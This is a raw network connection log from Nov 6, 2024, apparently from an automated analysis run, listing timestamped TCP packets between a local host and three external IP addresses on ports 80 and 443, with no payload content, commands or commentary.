                                              Nov 6, 2024 17:02:51.182498932 CET5686480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:51.182923079 CET8056875193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:51.183280945 CET5687580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:51.183412075 CET5687580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:51.188400984 CET8056875193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:51.281537056 CET4435687013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.281630993 CET4435687013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.281722069 CET56870443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.282040119 CET56870443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.282059908 CET4435687013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.282084942 CET56870443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.282089949 CET4435687013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.284719944 CET56876443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.284750938 CET4435687613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.285079002 CET56876443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.285079002 CET56876443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.285101891 CET4435687613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.362974882 CET4435687113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.363476992 CET56871443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.363506079 CET4435687113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.363948107 CET56871443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.363960981 CET4435687113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.421185017 CET4435687213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.421741009 CET56872443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.421757936 CET4435687213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.422205925 CET56872443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.422213078 CET4435687213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.492799044 CET4435687113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.492902040 CET4435687113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.493041039 CET56871443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.493084908 CET56871443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.493099928 CET4435687113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.493113995 CET56871443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.493119001 CET4435687113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.495732069 CET56877443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.495765924 CET4435687713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.495886087 CET56877443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.496047020 CET56877443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.496056080 CET4435687713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.526937962 CET4435687313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.527394056 CET56873443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.527427912 CET4435687313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.527853966 CET56873443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.527863026 CET4435687313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.551117897 CET4435687213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.551213026 CET4435687213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.551331043 CET56872443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.551395893 CET56872443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.551395893 CET56872443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.551419973 CET4435687213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.551431894 CET4435687213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.554925919 CET56878443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.554991007 CET4435687813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.555102110 CET56878443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.555282116 CET56878443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.555294991 CET4435687813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.663795948 CET4435687313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.663899899 CET4435687313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.663949966 CET56873443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.664108992 CET56873443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.664125919 CET4435687313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.666997910 CET56879443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.667030096 CET4435687913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.667126894 CET56879443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.667247057 CET56879443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.667252064 CET4435687913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.950792074 CET8056874193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:51.991301060 CET56880443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:51.991345882 CET44356880188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:51.991533041 CET56880443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:51.998784065 CET56880443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:51.998795986 CET44356880188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:52.005297899 CET5687480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:52.031490088 CET4435687613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.062014103 CET56876443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.062033892 CET4435687613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.065993071 CET56876443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.066001892 CET4435687613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.194586039 CET4435687613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.194657087 CET4435687613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.197746038 CET56876443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.238951921 CET4435687713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.254709005 CET56876443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.254734039 CET4435687613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.254755974 CET56876443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.254764080 CET4435687613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.269313097 CET56877443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.269335032 CET4435687713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.269763947 CET56877443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.269771099 CET4435687713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.285614967 CET4435687813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.333408117 CET56878443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.342128992 CET56878443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.342144012 CET4435687813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.379285097 CET56878443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.379302979 CET4435687813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.396816015 CET4435687713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.396939993 CET4435687713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.396989107 CET56877443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.403461933 CET4435687913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.458395958 CET56879443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.497669935 CET56877443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.497701883 CET4435687713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.497719049 CET56877443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.497725010 CET4435687713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.501930952 CET56879443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.501944065 CET4435687913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.502507925 CET56879443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.502516031 CET4435687913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.505728960 CET4435687813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.505892038 CET4435687813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.505938053 CET56878443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.509818077 CET56878443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.509844065 CET4435687813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.509862900 CET56878443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.509871006 CET4435687813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.521524906 CET56881443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.521555901 CET4435688113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.521646023 CET56881443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.522499084 CET56882443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.522531033 CET4435688213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.522578001 CET56882443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.522813082 CET56882443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.522821903 CET4435688213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.524163008 CET56883443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.524182081 CET4435688313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.524251938 CET56883443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.525300026 CET56881443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.525316000 CET4435688113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.525608063 CET56883443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.525619030 CET4435688313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.629014969 CET4435687913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.629190922 CET4435687913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.629256010 CET56879443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.635201931 CET56879443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.635222912 CET4435687913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.641011000 CET44356880188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:52.664953947 CET56884443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.664988041 CET4435688413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.665041924 CET56884443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.667242050 CET56880443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:52.667267084 CET44356880188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:52.668348074 CET56884443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:52.668364048 CET4435688413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:52.819643974 CET44356880188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:52.819724083 CET44356880188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:52.819780111 CET56880443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:52.824393988 CET56880443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:52.832575083 CET5687480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:52.836389065 CET5688580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:52.838213921 CET8056874193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:52.838260889 CET5687480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:52.841264963 CET8056885193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:52.841321945 CET5688580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:52.841434002 CET5688580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:52.846640110 CET8056885193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:53.052979946 CET8056875193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:53.054406881 CET56886443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:53.054454088 CET44356886188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:53.054512024 CET56886443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:53.054806948 CET56886443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:53.054820061 CET44356886188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:53.099025965 CET5687580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:53.242878914 CET4435688113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.243375063 CET56881443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.243392944 CET4435688113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.243817091 CET56881443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.243825912 CET4435688113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.282716036 CET4435688213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.283227921 CET56882443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.283256054 CET4435688213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.283724070 CET56882443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.283735037 CET4435688213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.370912075 CET4435688113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.371244907 CET4435688113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.371309996 CET56881443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.371395111 CET56881443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.371395111 CET56881443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.371412039 CET4435688113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.371421099 CET4435688113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.374012947 CET56887443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.374047041 CET4435688713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.374125957 CET56887443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.374291897 CET56887443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.374303102 CET4435688713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.403260946 CET4435688413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.403760910 CET56884443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.403795004 CET4435688413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.404232025 CET56884443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.404238939 CET4435688413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.417129993 CET4435688213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.417222977 CET4435688213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.417278051 CET56882443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.417428017 CET56882443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.417428017 CET56882443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.417448044 CET4435688213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.417459011 CET4435688213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.420387030 CET56888443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.420424938 CET4435688813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.420639992 CET56888443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.420793056 CET56888443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.420804024 CET4435688813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.466815948 CET4435688313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.467302084 CET56883443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.467323065 CET4435688313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.467746019 CET56883443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.467751026 CET4435688313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.534495115 CET4435688413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.534574032 CET4435688413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.534635067 CET56884443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.534832001 CET56884443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.534847021 CET4435688413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.534863949 CET56884443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.534868956 CET4435688413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.538079977 CET56889443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.538117886 CET4435688913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.538187027 CET56889443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.538352966 CET56889443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.538366079 CET4435688913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.607384920 CET4435688313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.607467890 CET4435688313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.607700109 CET56883443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.607700109 CET56883443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.607800961 CET56883443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.607820034 CET4435688313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.610758066 CET56890443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.610794067 CET4435689013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.611080885 CET56890443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.611207008 CET56890443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:53.611217022 CET4435689013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:53.996678114 CET8056885193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:53.997026920 CET8056885193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:53.997144938 CET5688580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:53.998306990 CET56891443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:53.998344898 CET44356891188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:53.998409986 CET56891443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:53.998759985 CET56891443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:53.998773098 CET44356891188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:53.999155998 CET44356886188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:54.001322985 CET56886443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:54.001353025 CET44356886188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:54.123191118 CET4435688713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.123689890 CET56887443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.123713017 CET4435688713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.124174118 CET56887443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.124185085 CET4435688713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.160975933 CET44356886188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:54.161056042 CET44356886188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:54.161112070 CET56886443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:54.161824942 CET56886443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:54.162437916 CET4435688813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.163080931 CET56888443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.163099051 CET4435688813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.163563967 CET56888443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.163569927 CET4435688813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.165529013 CET5687580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:54.166568995 CET5689280192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:54.171055079 CET8056875193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:54.171108961 CET5687580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:54.171637058 CET8056892193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:54.171703100 CET5689280192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:54.171794891 CET5689280192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:54.176635981 CET8056892193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:54.252496958 CET4435688713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.252829075 CET4435688713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.252882004 CET56887443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.252914906 CET56887443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.252933025 CET4435688713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.252947092 CET56887443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.252952099 CET4435688713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.256047964 CET56893443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.256083012 CET4435689313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.256253004 CET56893443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.256280899 CET56893443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.256287098 CET4435689313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.278290033 CET4435688913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.278697014 CET56889443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.278719902 CET4435688913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.279134989 CET56889443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.279139996 CET4435688913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.296389103 CET4435688813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.296498060 CET4435688813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.296550035 CET56888443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.296665907 CET56888443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.296674967 CET4435688813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.296689987 CET56888443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.296694040 CET4435688813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.299659014 CET56894443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.299689054 CET4435689413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.299784899 CET56894443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.300004005 CET56894443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.300013065 CET4435689413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.358002901 CET4435689013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.359551907 CET56890443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.359566927 CET4435689013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.360486031 CET56890443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.360496044 CET4435689013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.407953024 CET4435688913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.408164024 CET4435688913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.408219099 CET56889443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.408272982 CET56889443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.408288956 CET4435688913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.408298969 CET56889443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.408303976 CET4435688913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.411052942 CET56895443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.411083937 CET4435689513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.411254883 CET56895443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.411432028 CET56895443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.411443949 CET4435689513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.490422010 CET4435689013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.490748882 CET4435689013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.490807056 CET56890443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.518762112 CET56890443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.518762112 CET56890443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.518786907 CET4435689013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.518796921 CET4435689013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.522170067 CET56896443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.522195101 CET4435689613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.522262096 CET56896443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.522592068 CET56896443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.522600889 CET4435689613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.637979031 CET44356891188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:54.639543056 CET56891443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:54.639564037 CET44356891188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:54.797384024 CET44356891188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:54.797473907 CET44356891188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:54.797524929 CET56891443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:54.798000097 CET56891443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:54.801630020 CET5688580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:54.802937031 CET5689780192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:54.807065010 CET8056885193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:54.807125092 CET5688580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:54.808059931 CET8056897193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:54.808144093 CET5689780192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:54.808233976 CET5689780192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:54.813024044 CET8056897193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:54.987761974 CET4435689313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.988285065 CET56893443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.988306046 CET4435689313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.988740921 CET56893443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:54.988748074 CET4435689313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:54.997239113 CET8056892193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:54.998536110 CET56898443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:54.998584032 CET44356898188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:54.998646021 CET56898443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:54.998956919 CET56898443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:54.998970032 CET44356898188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:55.032422066 CET4435689413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.032830954 CET56894443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.032856941 CET4435689413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.033685923 CET56894443192.168.2.613.107.246.45
